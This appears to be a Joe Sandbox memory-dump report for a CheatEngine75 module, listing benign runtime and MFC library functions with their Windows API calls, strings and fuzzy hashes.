
Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: b6d9097846a3518ac7e32286b8c2548b398fe9135194da1637abd4ded6ed81e2
Instruction ID: 4ea80edc843914bc702ea46c02f95ef9b0efa202451629d29dee4a57fa586a1f
Opcode Fuzzy Hash: b6d9097846a3518ac7e32286b8c2548b398fe9135194da1637abd4ded6ed81e2
Instruction Fuzzy Hash: 2E41E4F2D0521DABCB199FABCA01FAF3B76EB41B98F004569E81467151DB398D019FA0

Function 6B4D3CD5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 145
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 6B4D3D10
PathFindExtensionW.SHLWAPI(?), ref: 6B4D3D2A

Strings

.INI, xrefs: 6B4D3E5B
.CHM, xrefs: 6B4D3E11
.HLP, xrefs: 6B4D3E27, 6B4D3E2C

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: ExtensionFileFindModuleNamePath
String ID: .CHM$.HLP$.INI
API String ID: 2295281026-4017452060
Opcode ID: 26cc96e1d8abe53c0d0f1f272e4e52749dcdbcdb552579741ad34f71d2b7f717
Instruction ID: b5b6e34c1b1061c45dd29f15f2c332a9ced9c9767facad45db0756907fd3b381
Opcode Fuzzy Hash: 26cc96e1d8abe53c0d0f1f272e4e52749dcdbcdb552579741ad34f71d2b7f717
Instruction Fuzzy Hash: 69419FB59007089BEB30DB75C969F9AB3FCAF44304F0048AE9545D7680EFB8E944CB61

Function 6B600AD4 Relevance: 7.6, APIs: 5, Instructions: 87
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

dllmain_raw.LIBCMT ref: 6B600B11
dllmain_crt_dispatch.LIBCMT ref: 6B600B28
dllmain_raw.LIBCMT ref: 6B600B70
dllmain_crt_dispatch.LIBCMT ref: 6B600B83
dllmain_raw.LIBCMT ref: 6B600B96

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: ea88f599faf68697f211f50c5701152029d954f9c270755e78914cfdb8ad0dc0
Instruction ID: 3306355a60ff5f6b8244e7ce4767bce6efa727db0a6a51b172c4598993d3735b
Opcode Fuzzy Hash: ea88f599faf68697f211f50c5701152029d954f9c270755e78914cfdb8ad0dc0
Instruction Fuzzy Hash: 372183B1D0561DABCB298F66CE41E6F3B7AEB84B98B014565F81467210DB3A8D018FE0

Function 6B4FCC10 Relevance: 6.1, APIs: 4, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000000,6B6948E8), ref: 6B4FCC6D
VerSetConditionMask.KERNEL32(00000000), ref: 6B4FCC75
VerifyVersionInfoW.KERNEL32(0000011C,00000003,00000000), ref: 6B4FCC86
GetSystemMetrics.USER32(00001000), ref: 6B4FCC97

Part of subcall function 6B4FD5A0: __EH_prolog3.LIBCMT ref: 6B4FD5A7
Part of subcall function 6B4FD5A0: GetSysColor.USER32(00000016), ref: 6B4FD5B0
Part of subcall function 6B4FD5A0: GetSysColor.USER32(0000000F), ref: 6B4FD5C3
Part of subcall function 6B4FD5A0: GetSysColor.USER32(00000015), ref: 6B4FD5DA
Part of subcall function 6B4FD5A0: GetSysColor.USER32(0000000F), ref: 6B4FD5E6
Part of subcall function 6B4FD5A0: GetDeviceCaps.GDI32(?,0000000C), ref: 6B4FD60E
Part of subcall function 6B4FD5A0: GetSysColor.USER32(0000000F), ref: 6B4FD61C
Part of subcall function 6B4FD5A0: GetSysColor.USER32(00000010), ref: 6B4FD62A
Part of subcall function 6B4FD5A0: GetSysColor.USER32(00000015), ref: 6B4FD638
Part of subcall function 6B4FD5A0: GetSysColor.USER32(00000016), ref: 6B4FD646
Part of subcall function 6B4FD5A0: GetSysColor.USER32(00000014), ref: 6B4FD654
Part of subcall function 6B4FD5A0: GetSysColor.USER32(00000012), ref: 6B4FD662
Part of subcall function 6B4FD5A0: GetSysColor.USER32(00000011), ref: 6B4FD670
Part of subcall function 6B4FD5A0: GetSysColor.USER32(00000006), ref: 6B4FD67B
Part of subcall function 6B4FD5A0: GetSysColor.USER32(0000000D), ref: 6B4FD686
Part of subcall function 6B4FD5A0: GetSysColor.USER32(0000000E), ref: 6B4FD691
Part of subcall function 6B4FD5A0: GetSysColor.USER32(00000005), ref: 6B4FD69C
Part of subcall function 6B4FD5A0: GetSysColor.USER32(00000008), ref: 6B4FD6AA
Part of subcall function 6B4FD5A0: GetSysColor.USER32(00000009), ref: 6B4FD6B5
Part of subcall function 6B4FD5A0: GetSysColor.USER32(00000007), ref: 6B4FD6C0
Part of subcall function 6B4FD5A0: GetSysColor.USER32(00000002), ref: 6B4FD6CB
Part of subcall function 6B4FD5A0: GetSysColor.USER32(00000003), ref: 6B4FD6D6
Part of subcall function 6B4FD5A0: GetSysColor.USER32(0000001B), ref: 6B4FD6E4
Part of subcall function 6B4FD5A0: GetSysColor.USER32(0000001C), ref: 6B4FD6F2
Part of subcall function 6B4FD5A0: GetSysColor.USER32(0000000A), ref: 6B4FD700

Part of subcall function 6B4FD06C: __EH_prolog3_GS.LIBCMT ref: 6B4FD076
Part of subcall function 6B4FD06C: GetDeviceCaps.GDI32(?,00000058), ref: 6B4FD096
Part of subcall function 6B4FD06C: DeleteObject.GDI32(00000000), ref: 6B4FD100
Part of subcall function 6B4FD06C: DeleteObject.GDI32(00000000), ref: 6B4FD11E
Part of subcall function 6B4FD06C: DeleteObject.GDI32(00000000), ref: 6B4FD13C
Part of subcall function 6B4FD06C: DeleteObject.GDI32(00000000), ref: 6B4FD15A
Part of subcall function 6B4FD06C: DeleteObject.GDI32(00000000), ref: 6B4FD178
Part of subcall function 6B4FD06C: DeleteObject.GDI32(00000000), ref: 6B4FD196
Part of subcall function 6B4FD06C: DeleteObject.GDI32(00000000), ref: 6B4FD1B4

Part of subcall function 6B4FCCF5: GetSystemMetrics.USER32(00000031), ref: 6B4FCD03
Part of subcall function 6B4FCCF5: GetSystemMetrics.USER32(00000032), ref: 6B4FCD11
Part of subcall function 6B4FCCF5: SetRectEmpty.USER32(6B694A54), ref: 6B4FCD24
Part of subcall function 6B4FCCF5: EnumDisplayMonitors.USER32(00000000,00000000,6B4FCB8D,6B694A54), ref: 6B4FCD34
Part of subcall function 6B4FCCF5: SystemParametersInfoW.USER32(00000030,00000000,6B694A54,00000000), ref: 6B4FCD43
Part of subcall function 6B4FCCF5: SystemParametersInfoW.USER32(00001002,00000000,6B694A78,00000000), ref: 6B4FCD70
Part of subcall function 6B4FCCF5: SystemParametersInfoW.USER32(00001012,00000000,6B694A7C,00000000), ref: 6B4FCD84
Part of subcall function 6B4FCCF5: SystemParametersInfoW.USER32(0000100A,00000000,6B694A8C,00000000), ref: 6B4FCDAA

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: Color$DeleteObjectSystem$Info$Parameters$Metrics$CapsConditionDeviceMask$DisplayEmptyEnumH_prolog3H_prolog3_MonitorsRectVerifyVersion
String ID:
API String ID: 551326122-0
Opcode ID: bcd546aae96d5f6eceae93851ed89e383ce9ee2337ca36012c453b32a3828e55
Instruction ID: eb79210572058b9c72868204d0dcef03328ed103d0d3767f07b97633bf02106e
Opcode Fuzzy Hash: bcd546aae96d5f6eceae93851ed89e383ce9ee2337ca36012c453b32a3828e55
Instruction Fuzzy Hash: 6511CAB0A00318ABDB259F758C46FEB77BCEB89704F00405EE606D7180CBB48A458BE0

Function 6B60091D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__RTC_Initialize.LIBCMT ref: 6B60096A

Part of subcall function 6B6017FC: InitializeSListHead.KERNEL32(6B6964F8,6B600974,6B688D10,00000010,6B600905,?,?,?,6B600B2D,?,00000001,?,?,00000001,?,6B688D58), ref: 6B601801

___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6B6009D4

Strings

0#Lk, xrefs: 6B6009EA

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
String ID: 0#Lk
API String ID: 3231365870-1841850333
Opcode ID: 4160eb88159699aceecaf39e31c5b3300b9415a031f25ed8c9a4cbfd0263ad3f
Instruction ID: 07b8d89714e3153980d42c29382d41fd4ad670a424b2d541c765edb1e2fb20c3
Opcode Fuzzy Hash: 4160eb88159699aceecaf39e31c5b3300b9415a031f25ed8c9a4cbfd0263ad3f
Instruction Fuzzy Hash: 1621F0F254936E9AEF086FBB86027DC7361AF5232DF144059E684671C2DF3E4101DB6A

Function 6B4D0E1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 6B4D0E42
PathFindExtensionW.SHLWAPI(?), ref: 6B4D0E58

Part of subcall function 6B4D0911: __EH_prolog3_GS.LIBCMT ref: 6B4D091B

Strings

%Ts%Ts.dll, xrefs: 6B4D0E65

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: ExtensionFileFindH_prolog3_ModuleNamePath
String ID: %Ts%Ts.dll
API String ID: 3433622546-1896370695
Opcode ID: 75a48ac2f9da7555e234c528436d028bcffaffd5c100e49abf6d3f8cea475a5c
Instruction ID: 8a586cdd2cc16e0f7ec4aec2225a3aba98f5a55943b5aa6bf4f58297b5642847
Opcode Fuzzy Hash: 75a48ac2f9da7555e234c528436d028bcffaffd5c100e49abf6d3f8cea475a5c
Instruction Fuzzy Hash: 8B016D72A00119BBDB11EBA4DD55EEF73F8EF49700F0000AA9511D7240EB74EA09DB90

Function 6B4D1540 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__snprintf_s.LIBCMT ref: 6B4D1583

Part of subcall function 6B4CE0A9: __vsnwprintf_s_l.LEGACY_STDIO_DEFINITIONS ref: 6B4CE0BE

Strings

LOC, xrefs: 6B4D1565

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: __snprintf_s__vsnwprintf_s_l
String ID: LOC
API String ID: 3877413697-519433814
Opcode ID: 1d8e611c8bf5fd9e964b4065bd6b4a2424f8ba0550f70335921b3a7b8d3b6e06
Instruction ID: bd59b15c23aa0e955fb2fc1ef3333316a6648298e9bfbea0303c83506825ac0e
Opcode Fuzzy Hash: 1d8e611c8bf5fd9e964b4065bd6b4a2424f8ba0550f70335921b3a7b8d3b6e06
Instruction Fuzzy Hash: FA1106B1981128BBDB006FB59D52FCA33A89F05764F0004AAE906AB0D0EF3CDD404BA1

Function 6B4D0911 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_GS.LIBCMT ref: 6B4D091B

Part of subcall function 6B4D8CD8: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,?,00000108,6B4D0E82,?,?), ref: 6B4D8D0B
Part of subcall function 6B4D8CD8: GetProcAddress.KERNEL32(00000000,GetThreadPreferredUILanguages), ref: 6B4D8D1B
Part of subcall function 6B4D8CD8: EncodePointer.KERNEL32(00000000,?,?,?,00000108,6B4D0E82,?,?), ref: 6B4D8D24

Strings

y, xrefs: 6B4D096D

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: AddressEncodeH_prolog3_HandleModulePointerProc
String ID: y
API String ID: 2428170207-4225443349
Opcode ID: be59e9fc15a8dd2cbc93ea5a5d49908ca57638bda76c4b2aa789c17114f6aedf
Instruction ID: e44ef5598e7e74f7b97cbb269cc58c7fd7406c419bd53dcdd6c9cfdefd7f44a1
Opcode Fuzzy Hash: be59e9fc15a8dd2cbc93ea5a5d49908ca57638bda76c4b2aa789c17114f6aedf
Instruction Fuzzy Hash: 19214AB6D01128ABDB259B64CC61FDE7378AF14718F0042D5A98467280DBB89FC48F95

Function 6B4D3951 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_catch.LIBCMT ref: 6B4D3958

Part of subcall function 6B4D4586: EnterCriticalSection.KERNEL32(6B694508,?,?,?,?,6B4D396B,00000010,00000008,6B4D027A,6B4D02BD,Function_00010251,6B4D03EB,6B4C645A,?,?,?), ref: 6B4D4543
Part of subcall function 6B4D4586: InitializeCriticalSection.KERNEL32(00000000,?,?,?,6B4D396B,00000010,00000008,6B4D027A,6B4D02BD,Function_00010251,6B4D03EB,6B4C645A,?,?,?), ref: 6B4D4559
Part of subcall function 6B4D4586: LeaveCriticalSection.KERNEL32(6B694508,?,?,?,6B4D396B,00000010,00000008,6B4D027A,6B4D02BD,Function_00010251,6B4D03EB,6B4C645A,?,?,?), ref: 6B4D4567
Part of subcall function 6B4D4586: EnterCriticalSection.KERNEL32(00000000,?,?,?,6B4D396B,00000010,00000008,6B4D027A,6B4D02BD,Function_00010251,6B4D03EB,6B4C645A,?,?,?), ref: 6B4D4574

Strings

0#Lk, xrefs: 6B4D3977

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: CriticalSection$Enter$H_prolog3_catchInitializeLeave
String ID: 0#Lk
API String ID: 1641187343-1841850333
Opcode ID: b4eab41c468084a7fb1977c70272167b191f7e24d3d5a72a3352dfbc05c89b11
Instruction ID: 247b99c5ddaa18c0baf8ed06960def8619367b0c6457a64be613e41c57af5722
Opcode Fuzzy Hash: b4eab41c468084a7fb1977c70272167b191f7e24d3d5a72a3352dfbc05c89b11
Instruction Fuzzy Hash: 03E04F7051520ADFEB54AF70C526F8CB770BF51369F204579E2816A2D0DFB88990DF51

Function 6B4D3C77 Relevance: 3.0, APIs: 2, Instructions: 31
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,?,?,?,?,?,6B4C37F5), ref: 6B4D3C7D
SetErrorMode.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,6B4C37F5), ref: 6B4D3C89

Part of subcall function 6B4D3CD5: GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 6B4D3D10
Part of subcall function 6B4D3CD5: PathFindExtensionW.SHLWAPI(?), ref: 6B4D3D2A

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: ErrorMode$ExtensionFileFindModuleNamePath
String ID:
API String ID: 1764437154-0
Opcode ID: 861458795a1592e57b109cd513c01b504f51c02fe374deece0d55267c8359074
Instruction ID: 99c0551f9027c7a5c3e657664cdfe50dac5003f310ec7da0ffb2b7eba8262719
Opcode Fuzzy Hash: 861458795a1592e57b109cd513c01b504f51c02fe374deece0d55267c8359074
Instruction Fuzzy Hash: 83F09A719113049FDB20AFB5C02EF497BA8EF04B24F00849EE8089B311DB79D842CBE2

Function 6B4D143E Relevance: 1.6, APIs: 1, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 6B4D8C5F: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,6B4D1467,6B4D09A5,00000003,?,00000004,6B4D09A5), ref: 6B4D8C71
Part of subcall function 6B4D8C5F: GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 6B4D8C81
Part of subcall function 6B4D8C5F: EncodePointer.KERNEL32(00000000,?,6B4D1467,6B4D09A5,00000003,?,00000004,6B4D09A5), ref: 6B4D8C8A

__snprintf_s.LIBCMT ref: 6B4D149C

Part of subcall function 6B4CE0A9: __vsnwprintf_s_l.LEGACY_STDIO_DEFINITIONS ref: 6B4CE0BE

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: AddressEncodeHandleModulePointerProc__snprintf_s__vsnwprintf_s_l
String ID:
API String ID: 3155208388-0
Opcode ID: 8a70048d9669092502778e51a6353a57db00cde556d71567c5df512c261d5165
Instruction ID: b3a48eeadaebbbe523bb537d8942d7d2c12878e579046db958b6676da07d184e
Opcode Fuzzy Hash: 8a70048d9669092502778e51a6353a57db00cde556d71567c5df512c261d5165
Instruction Fuzzy Hash: 65110D71940128ABDF046FB5CD96FDE33BCAF01714F0044AAA914A71C0EB3C9A0487A1

Function 6B4CDBA5 Relevance: 1.5, APIs: 1, Instructions: 32
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(00000000,?,?,6B67B578,00000010,6B4C815C,00000000,00000000,00000800,?,00000000), ref: 6B4CDBE5

Part of subcall function 6B4CDCF9: OutputDebugStringA.KERNEL32(IsolationAware function called after IsolationAwareCleanup,-00000034,?,6B4D33E8,00000000,6B67C1E8,00000010,6B4D3F31,00000000,?,00000000), ref: 6B4CDD0D

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: DebugLibraryLoadOutputString
String ID:
API String ID: 137895185-0
Opcode ID: dd0033e6ed5956e7836de316b96270f9c051a9102e2a56ae32e282da708cd896
Instruction ID: ec53cebfdec674e0cac3fb329958587d3c189add4631858573cea1173de10e7f
Opcode Fuzzy Hash: dd0033e6ed5956e7836de316b96270f9c051a9102e2a56ae32e282da708cd896
Instruction Fuzzy Hash: 6EF062BAD84319DFEF109FA5C804B9E77B0FB08726F004519E521A2290D7BD9145CF51

Function 6B4D02BD Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6B4D02C4

Part of subcall function 6B4D357A: LocalAlloc.KERNEL32(00000040,00000000,?,6B4D3B5D,00000010,?,?,00000000,?,?,?,?,?,?,6B4C37F5), ref: 6B4D3582

Part of subcall function 6B4CFEA2: __EH_prolog3_catch.LIBCMT ref: 6B4CFEA9

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
